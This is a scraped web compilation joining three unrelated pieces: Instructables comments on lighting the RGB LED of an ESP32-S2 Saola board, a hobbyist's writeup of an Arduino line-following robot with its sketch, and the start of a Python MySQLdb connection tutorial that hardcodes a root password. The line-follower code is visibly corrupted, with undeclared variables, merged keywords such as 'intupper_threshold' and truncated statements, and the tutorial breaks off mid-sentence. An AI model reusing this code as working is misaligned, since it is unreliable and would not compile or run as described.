Attachments Be the First to Share Recommendations 58 3.8K 137 5.8K 1 118 10K 8 Comments 8 months ago on Step 1 After looking all over to find a working example I finally found this. Luckily I had already loaded the ESP32S2 board to the Arduino IDE so it was much easier to get this working. Thanks JeffL117! Reply 8 months ago Your welcome, happy to help. 1 year ago Dear Jeff. Thank for your work using the Saola esp32-2s. I am attempting to upload any sketch to this unit and I'm greeted be a header error. I have selected node32s for a suitable board. I want to use whatever you selected because it obviously works. So, what board should I select as there is no Saola in the list of esp32 choices. Thank you in advance. Bill Phillips retired Reply 1 year ago Hey Bill you need to make sure you have the ESP32-S2 libraries. make sure that you change the branch from Master to ESP32-S2 Reply 1 year ago Now Sunday, August 16th, 2020: before you reply to my last reporting to you, I have followed the instructions from github , for windows, to install the library. It ends prematurely. I then watched a couple YouTube video's on the topic of installing the -S2 and trying to follow english subtitles with the guy's moving their mouse to fast over text too small .. well I just wished your instructable on the S2-- Saola had included the Arduino IDE setup. Seems that Arduino has not completed their official support for the S2. Thank yo for listening..back to the esp8266 for now. Bill Phillips Surrey, BC, Canada. Reply 11 months ago I agree with those words , I have tried for weeks to make it work and no luck. Need a much better explaniation of how to install this so Arduino IDE can be used. Reply 1 year ago Thank you. I did select the esp32-s2 branch, downloaded the zip file. The IDE reported 'not a valid library'.So I unzipped it and manually copied it to the sketch directory libraries. This time the complaint was: Invalid library found in C:\Users\TwWork 3\Documents\Arduino\libraries\arduino-esp32-esp32s2: no headers files (.h) found in C:\Users\TwWork 3\Documents\Arduino\libraries\arduino-esp32-esp32s2 I noticed too, that the library contained a tools folder containing .exe's. Not sure what to do now. Regards, Bill Phillips 1 year ago on Step 1 Hi, Thank you for the project. I have tested this on my ESP32S2 dev board and it works fine, however, if I try and use the setpixelcolor function after initialising a wifi connection, the LED does not show the correct color or intensity. The following example show the LED in red, green, blue and white and then does a wifi connect. It the attempt to do the same color display but it goes wrong. Apparently something to do with the following:... Suggestion is to use the FastLED library (but I have not been able to get that to work). #include <Adafruit_NeoPixel.h> #include <WiFi.h> #include <WiFiMulti.h> // On the ESP32S2 SAOLA GPIO is the NeoPixel. #define PIN 18 Adafruit_NeoPixel pixels(1, PIN, NEO_GRB + NEO_KHZ800); //Single NeoPixel WiFiMulti WiFiMulti; // Simple function to set a color based on RGB values void ShowColor(int r, int g, int b) { pixels.setPixelColor(0, r, g, b); //Set the new color on the pixel. pixels.show(); // Send the updated pixel colors to the hardware. delay(1000); // Pause before next pass through loop } void setup() { Serial.begin(115200); delay(10); Serial.println("Setting brightness"); pixels.setBrightness(10); pixels.begin(); // INITIALIZE NeoPixel (REQUIRED) ShowColor(0, 0, 0); ShowColor(255, 0, 0); ShowColor(0, 255, 0); ShowColor(0, 0, 255); ShowColor(255, 255, 255); pixels.clear(); pixels.show(); // We start by connecting to a WiFi network WiFiMulti.addAP("SSID", "password"); Serial.println(); Serial.println(); Serial.print("Waiting for WiFi... "); while (WiFiMulti.run() != WL_CONNECTED) { Serial.print("."); delay(500); } Serial.println(""); Serial.println("WiFi connected"); Serial.print("IP address: "); Serial.println(WiFi.localIP()); ShowColor(255,0,0); ShowColor(0,255,0); ShowColor(0,0,255); ShowColor(255,255,255); ShowColor(0,0,0); } void loop() { } Any help appreciated.
https://www.instructables.com/ESP32-S2-Saola-Making-the-RGB-Work/
CC-MAIN-2021-39
refinedweb
1,042
65.42
Adding. So now it was time to go ahead and start making the connections of the line follower. I restacked the shield again on top of the Arduino. Afterwards, I connected the left motor to the shield where it says M1. I used two jumper cables to connect the end of the wires from the servo to the shield since the servo’s end wires weren't going to be able to connect through the holes of M1. I did the same thing with the right motor but connected to where it says M3 as shown in the picture below. When making these connections, don't insert any of the wires into the port where it says GND. Just use the two ports directly underneath the scripts of the motors. I didn't know which of the two wires would to what port since they may spin in the opposite direction once they are powered but I will not until everything is powered on and working. The blue wires from the sensor, I connected them on top of the shield at the analog pins from analog pin 0 to analog pin 4. The most left sensor would go into analog pin 0. The sensor next to the most left would go into analog pin 1. The middle sensor would go into analog pin 2 and so forth for the two sensor wires. For the power wire of the sensor board, I connected it directly to the regulated 5V pin on the Arduino. The green wire was connected to one of the ground pins next to the regulated 5V pin. Now to power this robot, I decided to use two separate power sources for the Arduino and for the motor shield since I've online that sharing a power source can sometimes create some problems. For the Arduino, I used a 9V battery to connect through the barrel jack that came with it. For the motor shield, I got my hands on a battery case that I borrowed from my school. The case holds 6 AA batteries that would a final 9V to the motor shield. From reading online, you cannot use a regular 9V battery such as the one I am using for the Arduino. The recommended voltage for the motor shield is 5 to 12 volts so 9 volts is okay. I connect the battery case on the shield where it reads power. In the picture below, all my connections are done. Just that I have not completed the battery connections for the Arduino or the motor shield. I placed the Arduino on top of the sensor board. I decided to put electrical tape underneath the Arduino as a precaution to avoid any short circuiting of the sensor board and of the Arduino. The battery pack for the motor shield was placed towards the back of the frame as shown. The 9V battery for the Arduino was placed to the side as shown. With the case closed: The Programming: For the programming of the Arduino, I first got a code that was already prewritten for the line follower using this setup. The link to the code is: But this code was used for an older version of the shield that I am using. So I had to make just a few changes to make the code work. But first I had to download the library for the motor which was found on the website where I ordered the shield from, Adafruit.com. Once the library is downloaded, it is important to copy it to the Arduino's libraries folder. So that's what I did. After copying the library, I made the changes to the code from the link above. The code is: // Linus the Line-bot // Follows a Black line on a White surface(poster-board and electrical type or the floor and tape). // Code by JDW 2010 - feel free to modify. // Modified by Gerardo Ramos March 11, 2014 // My first arduino project, first electronic project #include <Wire.h> // this includes the Afmotor library for the motor-controller #include <Adafruit_MotorShield.h> #include "utility/Adafruit_PWMServoDriver.h" Adafruit_MotorShield AFMS = Adafruit_MotorShield(); Adafruit_DCMotor *motor_left=AFMS.getMotor(1); // attach motor_left to the Adafruitmotorshield M1 Adafruit_DCMotor *motor_right=AFMS.getMotor(3); // attach motor_right to the Adafruitmotorshield M3 // Create variables for sensor readings int sensor1 = 0; int sensor2 = 0; int sensor3 = 0; int sensor4 = 0; int sensor5 = 0; // Create variables for adjusted readings int adj_1=0; int adj_2=0; int adj_3=0; int adj_4=0; int adj_5=0; // You can change the min/max values below to fine tune each sensorlower_threshold=80; // Value to define a middle threshold(half of the total 255 value range) int threshold=110; // This threshold defines when the sensor is reading the white poster board or // the floor if you are testing it on the floor like I did. intupper_threshold=200; // This value sets the maximum speed of linus (max=255). // using a speed potentiometer will over-ride this setting. intspeed_value=220; // End of changeable variables void setup() { Serial.begin(9600); // Start serial monitor to see sensor readings AFMS.begin(); // declare left motor motor_left->setSpeed(255); motor_left->run(RELEASE); // declare right motor motor_right->setSpeed(255); motor_right->run(RELEASE); } voidupdate_sensors(){ // This will read sensor 1 sensor1=analogRead(0); adj_1=map(sensor1,s1_min,s1_max,0,255); adj_1=constrain(adj_1,0,255); // This will read sensor 2 sensor2=analogRead(1); // sensor 2 =left-center adj_2=map(sensor2,s2_min,s2_max,0,255); adj_2=constrain(adj_2,0,255); // This will read sensor 3 sensor3=analogRead(2); // sensor 3 =center adj_3=map(sensor3,s3_min,s3_max,0,255); adj_3=constrain(adj_3,0,255); // This will read sensor 4 sensor4=analogRead(3); // sensor 4 = right-center adj_4=map(sensor4,s4_min,s4_max,0,255); adj_4=constrain(adj_4,0,255); // This will read sensor 5 sensor5=analogRead(4); //sensor5 = right adj_5=map(sensor5,s5_min,s5_max,0,255); adj_5=constrain(adj_5,0,255); } void loop(){ update_sensors(); // update the sensors // First, check the value of the center sensor if (adj_3<lower_threshold){ // If center sensor value is below threshold, check surrounding sensors if (adj_2>threshold && adj_4>threshold){ // If all sensors check out(if statements are satisfied), drive forward motor_left->run(FORWARD); motor_left->setSpeed(speed_value); motor_right->run(FORWARD); motor_right->setSpeed(speed_value); } // You want the line bot to stop when it reaches the black box/ else if (adj_1<30){ if (adj_2<30){ if (adj_3<30){ if (adj_4<30){ if (adj_5<30){ // Here all the sensors are reading black, so stop the bot. motor_left->run(RELEASE); motor_right->run(RELEASE); } } } } } } // Otherwise, the center sensor is above the threshold // So we need to check what sensor is above the black line else { // First check sensor 1 if (adj_1<upper_threshold&& adj); } // If not sensor 1 or 5, then check sensor 2 else if (adj_2<upper_threshold&& adj_4>upper_threshold){ motor_left->run(RELEASE); motor_left->setSpeed(0); motor_right->run(FORWARD); motor_right-(" "); } // End of this code Once I completed the code, I connected my Arduino to my laptop. Then I reopened the code, then compiled to make sure there were no errors. Then I uploaded the code to the Arduino. At this I didn’t have the motor shield powered. So in this way I can see what the sensors are reading. To do this I opened the serial monitor. Turn off autoscroll so you can see what the sensors are reading. So I placed the line follower on the floor to see what it reads. For me, it read the floor at high readings at 255 which is good. It means that it’s reading it as it were a white poster board. I didn’t have a large poster board to test the Arduino so I opted to just my floor. For my lower threshold I used 80. The original code had 20, which was good but sometimes my sensors didn't read long enough to read below 20. So I used 80. Just compare your readings of the black line to your thresholds. You want the reading of the black line to be lower than the lower threshold value. Here I was experimenting with 50 but it didn't really work out well. Sometimes my middle sensor would directly above the black line but would get a reading of sometimes in the 60's. So the if-else statement didn't work well with the line follower going in a straight line. Some of the reasons why it’s not reading a low enough a number is because maybe the sensors or placed to close or maybe the adjacent sensors are directly perpendicular to the floor. So maybe some of their infrared light is being read by the middle sensor. Whatever the reason was, I had to make increase my lower threshold value. There are times where my readings are as low as 8 but that isn't the case every time. So I increased my lower threshold to 80. And I also increased my threshold value to 110 just to make sure the if-else statements work. I also decreased my upper threshold value to 200 to allow it to account for slightly darker areas of the floor. The speed of the line follower can be chosen from any range from 0 to the maximum of 255. For me, I used 220. Compare your thresholds with the if-else statements to make sure that everything makes sense to and to figure what numbers you should choose for your setup since every setup is going to be slightly different. Doing a Test Run: Now after "calibrating" the line follower it was time to do a test run. At first I was doing a small track but the turns were a little too tight. So I did a bigger track. I used black electrical tape for the track. I made sure the tape was flat all around the track to prevent it from being too high and get in the way of the line follower as I have learned doing it a few times. There are times were the line follower does go off track but I think it's because it possibly be reading debris on the ground. Well that is the only explanation I can think off. Another issue that I had was that sometimes the turns could be too tight? Such as the at bottom right of my laptop. I figure that with a smaller frame, the robot can execute the turns much better as I have seen on YouTube videos of racing line followers. Well that's it guys until next where I will have video of the line follower in action.
http://bocabearingsworkshop.blogspot.com/2015/04/arduino-robot-project-part-4-shield-and.html
CC-MAIN-2017-51
refinedweb
1,763
69.62
XMLEncoder - Stackoverflowerror - overriding equals Jonathan Janisch Greenhorn Joined: Mar 17, 2007 Posts: 24 posted Apr 06, 2007 12:42:00 0 Hi, I'm trying to write out a class to XML using XMLEncoder . There's a few unique things about this class. 1) It has no default constructor 2) I'm overriding the equals method. 3) The class has a static int count which defaults to 0. Each object is assigned an ID based on the current count. The ID is used to compare two objects. Since it has no default constructor, I'm using the defaultpersistencedelegate. Here's the code: public class Person { private String name; private int id; private static int count = 0; /** * Creates a new instance of Person */ public Person(String name) { this.name = name; this.id = count; count++; System.out.println("Person constructor called. Count = " + count); } public boolean equals(Object obj) { System.out.println("Equals? This: " + this + " Obj: " + obj); if (obj instanceof Person) { System.out.println("Person: " + obj); return id == ((Person)obj).id; } else { return false; } } public int hashCode() { return id; } public String getName() { return name; } public int getId() { return id; } public void setId(int id) { this.id = id; System.out.println("setId called"); } public static void main(String[] args) { Person p1 = new Person("Java Duke"); Person p2 = new Person("John Smith"); Person p3 = new Person("Bob Jones"); java.beans.XMLEncoder enc = new java.beans.XMLEncoder(System.out); enc.setPersistenceDelegate(Person.class, new java.beans.DefaultPersistenceDelegate( new String[]{ "name"})); enc.writeObject(p1); enc.writeObject(p2); enc.writeObject(p3); enc.close(); } } If you run this, you will get a stackoverflowerror (atleast under jdk1.6.0_01 on Windows). I'm not an XMLEncoder expert, I've narrowed the problem down and I came up with this simple Person.java example. The combination of the static int ID and override equals seems to be the problem. If you change the equals to: public boolean equals(Object obj) { return super.equals(obj); } It will still give the same error. However, if you remove the equals method completely, it will work fine and the xml output is as I expected. But unfortunately, I need to override the equals method. 1) Does anyone know how I can fix this? 2) Why would "return super.equals(obj)" give different behavior than having no equals method at all? Note: I realize if my class were really a Person class, the equals method should compare SSN, first and last name, etc. and not some made up int ID - this is just a simple example to demonstrate the problem. Thank you! Jonathan Janisch Greenhorn Joined: Mar 17, 2007 Posts: 24 posted Apr 06, 2007 13:12:00 0 I solved it using my own persistence delegate to create a new Person. I don't understand why I had to do this, since I thought that was the purpose of the defaultpersistencedelegate. I did see some stuff in the source for defaultpersistencedelegate that involved checks for overriding equals - but I won't pretend like I understand how it works. public class PersonPersistenceDelegate extends DefaultPersistenceDelegate { @Override protected Expression instantiate(Object oldInstance, Encoder out) { System.out.println("Instantiate called"); Person old = (Person)oldInstance; return new Expression(oldInstance, oldInstance.getClass(), "new", new Object[] { old.getName() }); } } I agree. Here's the link: subject: XMLEncoder - Stackoverflowerror - overriding equals Similar Threads EL Mystery Sort Arraylist by passing runtime parameter can you please this doubt about hashcode() doubt in treeset... instance & class methods All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter JForum | Paul Wheaton
http://www.coderanch.com/t/382409/java/java/XMLEncoder-Stackoverflowerror-overriding-equals
CC-MAIN-2015-48
refinedweb
587
59.09
On Thu, Sep 9, 2010 at 4:45 PM, Mo, Zhenyao <zhenyao@gmail.com> wrote:This does sound like an unclear area in the OpenGL spec. For example, > According. what happens if you query GL_FRAMEBUFFER_ATTACHMENT_OBJECT_NAME for the color attachment of such a framebuffer? The texture is still referenced by the framebuffer, so it probably hasn't been actually deleted, but the name is no longer accessible in the context's namespace. However, I'm not sure that this is really a security issue. OpenGL implementations are expected to not crash in this situation. If one does, then a given WebGL implementation might need to work around the crash, but I'm not convinced that an explicit mention of this in the spec, and associated divergence from OpenGL ES 2.0 behavior, is warranted.
https://www.khronos.org/webgl/public-mailing-list/archives/1009/msg00155.php
CC-MAIN-2016-44
refinedweb
133
57.47
Dear Developers Most of the developers on Apache Cocoon 2 are willing to produce the first beta very soon. I'd like to collect the showstopper issues remaining. A few days ago Carsten proposed the 18th of May for a beta date. No one objected it but there are still issues left and my time left to do it at the moment is really sparse. The recent discussion about Parameter forced me to have a look at all the interfaces that belong to sitemap component. I've found that we need to vote on the following topic. a) Does a Matcher need to be parameterized and thus need to expand the match method of the Matcher interface with Parameters? b) The same issue is true for Selector as well. Does it need it, too? The discussion and voting about moving the <parameter> element into the map namespace will block the beta release until it's done because this is a change of the sitemap syntax/semantic and we cannot do it afterward because it will break backward compatability. I know that it will not be a trivial change to whoever will patch the sitemap.xsl file because of some code optimation done there based on namespace tests (see my recent response to Marcus Crafters question about those tests). Another issue is the production of the dists. I've made some test yesterday evening and found that it is very huge (about 18M). After analysing it I've seen that the source dist has all the jar twice in it. Once int the ./lib and once in the ./webapp/WEB-INF/lib directory. How can/Should we reduce it? Also there is no "binary dist" target in the build.xml yet. Well, this might not be a issue for the beta-1 release. A few week/month ago we discussed about standardizing the namespaces we use in C2. The general pattern we agreed upon was: Where APPLICATION is either "cocoon" for cocoon centric applications or "xsp" for logicsheets, FOOBAR is the name of the application concern and VERSION is another pattern describing the version of the application in the form major.minor which are both positive integers. There have been ports of logicsheets from C1 which don't respect this normation. Should we change those namespaces to the pattern above or have new ones (with similar or equal functionallity) sometimes after going beta? Ah, the new (the old has this as well IIRC) I18nTransformer uses a parameter named src to specify the dictionary to use. I think it should be consistent with all sitemap components that such values are best specified in the src attribute of the transform element: <map:transform And also do we realy need two of them? Are they in such a way different from each other to legitimate this? As I've said in the beginning of this mail my time is very limited these days and thus I cannot propose a date for the beta because I cannot predict when the issues listed here will be fixed/realized. The 18th of May is tomorrow, so it will not be realizable (uh, another Avalon interface ? :). We can shift it from week to week but this doesn't makes any fun. For me and most of you this is a unpleasant situation but it doesn't makes any sense to define a date for going beta without seeing it really possible to make. So, your comments and votes :) Giacomo --------------------------------------------------------------------- To unsubscribe, e-mail: cocoon-dev-unsubscribe@xml.apache.org For additional commands, email: cocoon-dev-help@xml.apache.org
http://mail-archives.apache.org/mod_mbox/cocoon-dev/200105.mbox/%3C990082235.3b0374bbf12d5@mail.otego.com%3E
CC-MAIN-2014-52
refinedweb
601
62.98
Reference to child elementYue_Hong Dec 17, 2013 6:19 AM How can we reference to an element which is added dynamically on runtime? Example code: <?xml version="1.0" encoding="utf-8"?> <s:WindowedApplication xmlns:fx="" xmlns:s="library://ns.adobe.com/flex/spark" xmlns: <fx:Script> <![CDATA[ import mx.events.FlexEvent; protected function init(event:FlexEvent):void { trace(button1.label); var newbtn:Button = new Button(); newbtn.label = "New Button"; newbtn.id = "button3"; newbtn.name = "button3"; mygroup.addElement(newbtn); trace(this["button3"].label); } ]]> </fx:Script> <s:HGroup <s:Button <s:Button </s:HGroup> </s:WindowedApplication> When I try to run above code, it dispatch error Error #1069: Property button3 not found on project1 and there is no default value. So, how can I call to the newly added button? Thank you. 1. Re: Reference to child elementCraberoid Dec 17, 2013 7:27 AM (in response to Yue_Hong) Hi! Try getChildByName("button3"); 2. Re: Reference to child elementYue_Hong Dec 17, 2013 7:39 AM (in response to Craberoid) Tried. Not working. 3. Re: Reference to child elementpauland Dec 17, 2013 7:46 AM (in response to Yue_Hong) Yue_Hong wrote: Tried. Not working. It wouldn't . "button3" is a child of the group. Try myGroup.getChildByName("button3"); 4. Re: Reference to child elementCraberoid Dec 17, 2013 7:57 AM (in response to pauland) Or just use variables to hold references. If it will be array of dynamic elements, you can use Dictionary or associate array (Object), for example.
https://forums.adobe.com/thread/1360227
CC-MAIN-2016-07
refinedweb
246
60.11
You can use this module with the following in your ~/.xmonad/xmonad.hs: import XMonad.Actions.Commands Then add a keybinding to the runCommand action: , ((modMask x .|. controlMask, xK_y), runCommand commands) and define the list of commands you want to use: commands :: [(String, X ())] commands = defaultCommands Whatever key you bound to will now cause a popup menu of internal xmonad commands to appear. You can change the commands by changing the contents of the list commands. (If you like it enough, you may even want to get rid of many of your other key bindings!) For detailed instructions on editing your key bindings, see XMonad.Doc.Extending#Editing_key_bindings.
http://hackage.haskell.org/package/xmonad-contrib-0.6/docs/XMonad-Actions-Commands.html
CC-MAIN-2014-35
refinedweb
108
65.32
AN010 Finite State Machines Finite State Machines (FSM) are a great way to organize your code on embedded devices. The basic concepts are: - Each step is organized into a state, with defined exit conditions that cause it to transfer to other state(s). - State handlers should return quickly, rather than blocking. Our simple example here has four states: In reality, this example is so simple you could do it linearly, with blocking. That's example 02-Linear, but as you get more complicated code a finite state machine can keep your code simpler and easier to understand. While this example only has a single state machine, where they really shine is when you need to handle multiple state machines. For example, something like a web server on a Photon. You really have one state machine that's accepting new connections, and one for each concurrent connection. Doing that linearly would be crazy! You can download the files associated with this app note as a zip file. Author: Rick 01-Simple This is the simplest example of a state machine, which we'll walk through: This is just the standard stuff to set the modes: #include "Particle.h" SYSTEM_THREAD(ENABLED); SYSTEM_MODE(SEMI_AUTOMATIC); It's best to use the log handler instead of directly writing to the serial port. In addition to adding thread safety and timestamps, it also makes it easy to switch between Serial1 (TX/RX) and Serial (USB). When debugging sleep mode, it's better to use TX and an external TTL serial to USB serial converter (FT232) because the USB serial port disconnects when the device goes to sleep and takes a while to reconnect (especially under Windows). Using an external USB serial converter keeps the USB serial connection up even when the device is in sleep mode. But to switch between the two, you just need to comment out one line or the other here: Serial1LogHandler logHandler(115200); // SerialLogHandler logHandler; These are our configurable parameters. This uses Chrono Literals which is a great feature of Device OS 1.5.0 and later. Instead of setting 6 minutes in milliseconds (360000 or 6 60 1000), you can just use 6min. You can also use 30s for seconds. Or 2h for hours. // This is the maximum amount of time to wait for the cloud to be connected in // milliseconds. This should be at least 5 minutes. If you set this limit shorter, // on Gen 2 devices the modem may not get power cycled which may help with reconnection. const std::chrono::milliseconds connectMaxTime = 6min; // How long to sleep const std::chrono::seconds sleepTime = 1min; // Maximum time to wait for publish to complete. It normally takes 20 seconds for Particle.publish // to succeed or time out, but if cellular needs to reconnect, it could take longer, typically // 80 seconds. This timeout should be longer than that and is just a safety net in case something // goes wrong. const std::chrono::milliseconds publishMaxTime = 3min; These are the state numbers. In an enum, the values are sequential, so STATE_PUBLISH is 1. // These are the states in the finite state machine, handled in loop() enum State { STATE_WAIT_CONNECTED = 0, STATE_PUBLISH, STATE_PUBLISH_WAIT, STATE_SLEEP }; These are two state machine variables. One is the current state, which is one of the enumerated constants above. The other is a generic millis value that we use to time certain operations. // Global variables State state = STATE_WAIT_CONNECTED; unsigned long stateTime; A few more global variables. We'll talk about publishFuture more below, but it's a technique for using Particle.publish() asynchronously (non-blocking) while still getting the success or failure indication. // The publishFuture is used to find out when the publish completes, asynchronously particle::Future<bool> publishFuture; // A buffer to hold the JSON data we publish. char publishData[256]; Our setup() function. Since we used SEMI_AUTOMATIC mode we connect in setup(). Also remember the millis() value when we started up. This will be pretty close to 0. void setup() { Cellular.on(); Particle.connect(); stateTime = millis(); } Our loop() function. This example uses a big switch statement, based on the state number. There are other techniques that you may prefer in the other examples, including: ifstatements instead of switch switchbut with a separate function for each state - Using function pointers instead of state numbers - Using a separate class These will be described below. For the specific state, STATE_WAIT_CONNECTED, it does the following: - If the connection to the cloud has been established, go into STATE_PUBLISHstate. - If it's taken too long to connect (based on the value of connectMaxTime) go into STATE_SLEEPstate. - Otherwise hang out in this state. void loop() { switch(state) { case; } break; The next state is STATE_PUBLISH. This just makes up some JSON data by reading an analog value from pin A0, the publishes it. Note the result of Particle.publish() is stored in the publishFuture global variable. This is a particle::Future<bool>, not a plain bool. What's the difference? Particle.publish() normally returns a bool indicating whether the publish succeeded or not. This is especially useful when also using WITH_ACK to make sure the cloud received the publish. However, this is a little annoying because it blocks until complete. This normally can take up to 20 seconds, but might take up to 5 minutes! By storing the value in a Future instead of a bool, the Particle.publish() will still be able to find out the value, but in the future, without blocking! We always go into STATE_PUBLISH_WAIT state next to wait for the result to come in. case STATE_PUBLISH: { // This is just a placeholder for code that you're write for your actual situation int a0 = analogRead(A0); // Create a simple JSON string with the value of A0 snprintf(publishData, sizeof(publishData), "{\"a0\":%d}", a0); } Log.info("about to publish %s", publishData); publishFuture = Particle.publish("sensorTest", publishData, PRIVATE | WITH_ACK); state = STATE_PUBLISH_WAIT; stateTime = millis(); break; In STATE_PUBLISH_WAIT we wait until the Particle.publish() call completes. Because the call is asynchronous, we also have an opportunity to have an additional timeout. There are two parts to the future of interest: publishFuture.isDone()is true when the Particle.publish()call would have returned. publishFuture.isSucceeded()is trueif the publish succeed. It is falseif the publish failed. This should only be checked after isDone()is true. case STATE_PUBLISH_WAIT: // When checking the future, the isDone() indicates that the future has been resolved, // basically this means that Particle.publish would have returned. if (publishFuture.isDone()) { // isSucceeded() is whether the publish succeeded or not, which is basically the // boolean return value from Particle.publish. if (publishFuture.isSucceeded()) { Log.info("successfully published %s", publishData); state = STATE_SLEEP; } else { Log.info("failed to publish, will discard sample"); state = STATE_SLEEP; } } else if (millis() - stateTime >= publishMaxTime.count()) { Log.info("failed to publish, timed out, will discard sample"); state = STATE_SLEEP; } break; The final state is STATE_SLEEP. We put the device into stop mode sleep in this state, for the length of time specified in sleepTime. Upon waking up from sleep, we go into STATE_WAIT_CONNECTED state. We'll almost always still be connected, but going into this state will catch a few fringe cases. case STATE_SLEEP: Log.info("going to sleep for %ld seconds", (long) sleepTime.count()); { // This is the equivalent to: // System.sleep(WKP, RISING, SLEEP_NETWORK_STANDBY); SystemSleepConfiguration config; config.mode(SystemSleepMode::STOP) .gpio(WKP, RISING) .duration(sleepTime) .network(NETWORK_INTERFACE_CELLULAR); SystemSleepResult result = System.sleep(config); } Log.info("woke from sleep"); state = STATE_WAIT_CONNECTED; stateTime = millis(); break; } } 02-Linear This example just shows what the code would look like if we didn't use a state machine. For a simple example like this it may look cleaner, but as your code gets more complex it can get unwieldy quickly! One example of the subtle gotchas that can occur: Say you decide to enable the ApplicationWatchdog. In each of the two inner delay loops you'd also have to add a call to checkin() otherwise the device could end up resetting if it was having trouble connecting. That's not necessary in the state machine examples because the code returns from loop() frequently. 03-If-Statement This is basically the same as the 01-Simple example except if uses an if statement instead of switch. void loop() { if (state ==; } } else if (state == STATE_PUBLISH) { It's mostly just a matter of preference. 04-Case-Function While this example is pretty simple, you can imagine if you have a complex program, putting everything in loop() with a switch or if statement can get unwieldy! One common solution to this is to separate every state out into a separate function. void loop() { switch(state) { case STATE_WAIT_CONNECTED: stateWaitConnected(); break; case STATE_PUBLISH: statePublish(); break; case STATE_PUBLISH_WAIT: statePublishWait(); break; case STATE_SLEEP: stateSleep(); break; } } void stateWaitConnected() { //; } } 05-Function-Pointer One annoyance of the 04-Case-Function example is that every time you add a new state you need to add an enum value, a case in the switch statement, and a function. One solution to this is to just dispense with the enum and use function pointers. This is used instead of the State variable in the previous examples. typedef void (*StateHandler)(); StateHandler stateHandler = stateWaitConnected; Now the only thing in loop() is: void loop() { stateHandler(); } Disadvantage of this are that you can't easily print the state number to your debug log. You also can't increment state to go to the next state. 06-Class This is the method I prefer. It uses a style similar to the 05-Function-Pointer but instead of using plain C++ functions, use C++ class members! 06-Class.cpp This really empties out the main source file! #include "MainStateMachine.h" SYSTEM_THREAD(ENABLED); SYSTEM_MODE(SEMI_AUTOMATIC); Serial1LogHandler logHandler(115200); MainStateMachine mainStateMachine; void setup() { mainStateMachine.setup(); } void loop() { mainStateMachine.loop(); } MainStateMachine.h We have a new header file MainStateMachine.h. Here's what's in it: You normally declare the MainStateMachine as a global variable in your main source file. You should avoid doing much in the constructor, as there are limitations on what is safe at global object construction time. Instead, you do most setup in the setup() method, which you call from the application setup(). Same with loop(). class MainStateMachine { public: MainStateMachine(); virtual ~MainStateMachine(); void setup(); void loop(); In this example we have these methods to override the default values. You use them fluent-style. MainStateMachine &withConnectMaxTime(std::chrono::milliseconds connectMaxTime) { this->connectMaxTime = connectMaxTime; return *this;}; MainStateMachine &withSleepTime(std::chrono::seconds sleepTime) { this->sleepTime = sleepTime; return *this;}; MainStateMachine &withPublishMaxTime(std::chrono::milliseconds publishMaxTime) { this->publishMaxTime = publishMaxTime; return *this;}; You use these like this in your main application file: void setup() { mainStateMachine .withConnectMaxTime(10min) .withSleepTime(30min) .setup(); } You can chain zero or more of these and then call setup() with the changed values. There are also class member definitions for each of our states: protected: void stateWaitConnected(); void statePublish(); void statePublishWait(); void stateSleep(); And this scary looking definition! This declares stateHandler to be a class member function instead of a plain C++ function. std::function<void(MainStateMachine&)> stateHandler = 0; MainStateMachine.cpp The MainStateHander.cpp file has as few interesting features. This Logger statement allows the log statements in this file to be tagged and adjustable. static Logger log("app.msm"); Note the app.msm (Main State Machine) log statements in the serial log: 0000018272 [app.msm] INFO: woke from sleep 0000018273 [app.msm] INFO: connected to the cloud in 0 ms 0000018276 [app.msm] INFO: about to publish {"a0":1606} 0000018512 [app.msm] INFO: going to sleep for 60 seconds 0000018557 [comm.protocol] INFO: Posting 'S' describe message 0000018656 [comm.dtls] INFO: session cmd (CLS,DIS,MOV,LOD,SAV): 4 0000018665 [comm.dtls] INFO: session cmd (CLS,DIS,MOV,LOD,SAV): 3 0000018665 [comm.protocol] INFO: rcv'd message type=1 Using logging categories you can also set the level level for these messages independently of other messages. The only thing you need to remember to do is use log.info() (lower case l in log) instead of Log.info(). Of course you can use other things like log.trace(), log.error(), etc. as well as using sprintf-style formatting. void MainStateMachine::setup() { log.info("MainStateMachine::setup()"); Cellular.on(); Particle.connect(); The other thing is how you need to specify the state handler class member function. It really does need to be written like that, or it won't work. stateTime = millis(); stateHandler = &MainStateMachine::stateWaitConnected; } The loop function looks like this and calls the state handler member function (if not null). The *this parameter is necessary because it's a non-static class member function, so it needs to have this (the class instance) available to it. void MainStateMachine::loop() { if (stateHandler) { stateHandler(*this); } } The rest of the code should look similar to the other examples (except for the weird syntax for setting stateHandler): void MainStateMachine::stateWaitConnected() { // Wait for the connection to the Particle cloud to complete if (Particle.connected()) { log.info("connected to the cloud in %lu ms", millis() - stateTime); stateHandler = &MainStateMachine::statePublish; stateTime = millis(); } else if (millis() - stateTime >= connectMaxTime.count()) { // Took too long to connect, go to sleep log.info("failed to connect, going to sleep"); stateHandler = &MainStateMachine::stateSleep; } }
https://docs.particle.io/datasheets/app-notes/an010-finite-state-machines/
CC-MAIN-2022-21
refinedweb
2,175
57.47
In this tutorial, we're going to introduce how we interact with a MySQL database using Python. The module that we use to do this is called MySQLdb. To get this, run the following on your server: sudo apt-get install python-MySQLdb Once you have that, make sure it all worked by typing: python That should open a python instance in your server, so then do: import MySQLdb So long as that works, do a quick control+d to exit the python instance. Next, we want to make a Python file that can connect to the database. Generally you will have a separate "connect" file, outside of any main files you may have. This is usually true across languages, and here's why. Initially, you may have just a simple __init__.py, or app.py, or whatever, and that file does all of your operations. What can happen in time, however, is that your website does other things. For example, with one of my websites, Sentdex.com, I perform a lot of analysis, store that analysis to a database, and I also operate a website for users to use. Generally, for tasks, you will use what is called a "cron." A cron is a scheduled task that runs when you program it to run. Generally this runs another file, almost certain to not be your website's file. So then, to connect to a database, you'd have to write the database connecting code again in the file being run by your cron. As time goes on, these sorts of needs stack up where you have some files modifying the database, but you still want the website to be able to access it, and maybe modify it too. Then, consider what might happen if you change your database password. You'd then need to go to every single file that connects to the database and change that too. So, usually, you will find the smartest thing to do is to just create one file, which houses the connection code. That's what we're going to build today. import MySQLdb def connection(): conn = MySQLdb.connect(host="localhost", user = "root", passwd = "cookies!", db = "pythonprogramming") c = conn.cursor() return c, conn Import the module. Create a connection function to run our code. Here we specify where we're connecting to, the user, the user's password, and then the database that we want to connect to. Referencing the table will be done in the code that actually works with the table. As a note, we use "localhost" as our host. This just means we'll use the same server that this code is running on. You can connect to databases remotely as well, which can be pretty neat. To do that, you would connect to a host by their IP, or their domain. To connect to a database remotely, you will need to first allow it from the remote database that will be accessed/modified. Next, let's go ahead and edit our __init__.py file, adding a register function. For now we'll keep it simple, mostly just to test our connection 